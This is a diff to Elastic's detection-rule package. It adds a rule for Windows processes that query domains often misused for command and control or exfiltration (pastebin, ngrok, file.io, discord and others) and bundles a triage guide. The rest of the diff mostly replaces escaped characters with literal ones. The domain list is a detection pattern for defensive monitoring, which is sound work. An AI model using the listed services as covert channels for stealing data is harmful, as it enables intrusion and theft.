a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_110.json b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_110.json new file mode 100644 index 00000000000..ad0351d65cb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_110.json @@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Connection to Commonly Abused Web Services", + "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"*.pastebin.*\",\n \"*drive.google.*\",\n \"*docs.live.*\",\n \"*api.dropboxapi.*\",\n \"*dropboxusercontent.*\",\n \"*onedrive.*\",\n \"*4shared.*\",\n \"*.file.io\",\n \"*filebin.net\",\n \"*slack-files.com\",\n \"*ghostbin.*\",\n \"*ngrok.*\",\n \"*portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\",\n \"script.google.com\",\n \"script.googleusercontent.com\"\n ) and\n /* Insert noisy false positives here */\n not (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\BraveSoftware\\\\*\\\\Application\\\\brave.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Vivaldi\\\\Application\\\\vivaldi.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera*\\\\opera.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\"\n ) and process.code_signature.trusted == true\n ) or\n \n /* Discord App */\n (process.name : \"Discord.exe\" and (process.code_signature.subject_name : \"Discord Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : (\"discord.com\", \"cdn.discordapp.com\", \"discordapp.com\")\n ) or \n\n /* MS Sharepoint */\n (process.name : \"Microsoft.SharePoint.exe\" and (process.code_signature.subject_name : \"Microsoft Corporation\" and\n process.code_signature.trusted == true) and dns.question.name : \"onedrive.live.com\"\n ) or \n\n /* Firefox */\n (process.name : \"firefox.exe\" and (process.code_signature.subject_name : \"Mozilla Corporation\" and\n process.code_signature.trusted == true)\n ) or \n\n /* Dropbox */\n (process.name : \"Dropbox.exe\" and (process.code_signature.subject_name : \"Dropbox, Inc\" and\n process.code_signature.trusted == true) and dns.question.name : (\"api.dropboxapi.com\", \"*.dropboxusercontent.com\")\n ) or \n\n /* Obsidian - Plugins are stored on raw.githubusercontent.com */\n (process.name : \"Obsidian.exe\" and (process.code_signature.subject_name : \"Dynalist Inc\" and\n process.code_signature.trusted == true) and dns.question.name : \"raw.githubusercontent.com\"\n ) or \n\n /* WebExperienceHostApp */\n (process.name : \"WebExperienceHostApp.exe\" and (process.code_signature.subject_name : \"Microsoft Windows\" and\n process.code_signature.trusted == true) and dns.question.name : (\"onedrive.live.com\", \"skyapi.onedrive.live.com\")\n )\n ) \n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "66883649-f908-4a5b-a1e0-54090a1d3a32", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1102", + "name": "Web Service", + "reference": "https://attack.mitre.org/techniques/T1102/" + }, + { + "id": "T1568", + "name": "Dynamic Resolution", + "reference": "https://attack.mitre.org/techniques/T1568/", + "subtechnique": [ + { + "id": "T1568.002", + "name": "Domain Generation Algorithms", + "reference": "https://attack.mitre.org/techniques/T1568/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1567", + "name": "Exfiltration Over Web Service", + "reference": "https://attack.mitre.org/techniques/T1567/", + "subtechnique": [ + { + "id": "T1567.001", + "name": "Exfiltration to Code Repository", + "reference": "https://attack.mitre.org/techniques/T1567/001/" + }, + { + "id": "T1567.002", + "name": "Exfiltration to Cloud Storage", + "reference": "https://attack.mitre.org/techniques/T1567/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "66883649-f908-4a5b-a1e0-54090a1d3a32_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/66c058f3-99f4-4d18-952b-43348f2577a0_1.json b/packages/security_detection_engine/kibana/security_rule/66c058f3-99f4-4d18-952b-43348f2577a0_1.json index 74306e7527d..8ee81c6129a 100644 --- a/packages/security_detection_engine/kibana/security_rule/66c058f3-99f4-4d18-952b-43348f2577a0_1.json +++ b/packages/security_detection_engine/kibana/security_rule/66c058f3-99f4-4d18-952b-43348f2577a0_1.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_102.json b/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_102.json index 113c86ce89b..536177ba0e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_102.json +++ b/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_102.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_103.json b/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_103.json index 487e67d1ea9..c183107510f 100644 --- a/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_103.json +++ b/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_103.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_104.json b/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_104.json index f2f94ac164d..2a64dbd2ff3 100644 --- a/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_104.json +++ b/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_104.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_105.json b/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_105.json index 2d4433d6bb9..a87cb16d1e6 100644 --- a/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_105.json +++ b/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_105.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_4.json b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_4.json index 0ea8a4c8bc0..b4d6a5b76c6 100644 --- a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_4.json +++ b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_4.json @@ -64,7 +64,7 @@ ], "risk_score": 47, "rule_id": "670b3b5a-35e5-42db-bd36-6c5b9b4b7313", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```", "severity": "medium", "tags": [ "Elastic", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_5.json b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_5.json index ae38c50d820..88502e9acb0 100644 --- a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_5.json +++ b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_5.json @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "670b3b5a-35e5-42db-bd36-6c5b9b4b7313", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```", "severity": "medium", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_6.json b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_6.json index a09e9c5ec65..d52cb86bd5e 100644 --- a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_6.json +++ b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_6.json @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "670b3b5a-35e5-42db-bd36-6c5b9b4b7313", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_7.json b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_7.json index 5e6fe5e26b6..a337bbb46b5 100644 --- a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_7.json +++ b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_7.json @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "670b3b5a-35e5-42db-bd36-6c5b9b4b7313", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_8.json b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_8.json index 067e98ba00e..98f3297d9a5 100644 --- a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_8.json +++ b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_8.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "670b3b5a-35e5-42db-bd36-6c5b9b4b7313", - "setup": "\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n", + "setup": "\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_102.json b/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_102.json index c3e41177c72..d3677ee63dd 100644 --- a/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_102.json +++ b/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_102.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_103.json b/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_103.json index f2aa0220e8a..afb47a1dbf0 100644 --- a/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_103.json +++ b/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_103.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_104.json b/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_104.json index ca058f9edca..9b4eab02158 100644 --- a/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_104.json +++ b/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_104.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_105.json b/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_105.json index f6db7240ad9..a3f75288fb4 100644 --- a/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_105.json +++ b/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_105.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_206.json b/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_206.json index 7b5e0781af7..0e36302bf77 100644 --- a/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_206.json +++ b/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_206.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_101.json b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_101.json index 1181b2ba43f..00c471b9927 100644 --- a/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_101.json +++ b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_101.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_102.json b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_102.json index a0c8a2ac872..c62d9c44dc8 100644 --- a/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_102.json @@ -60,7 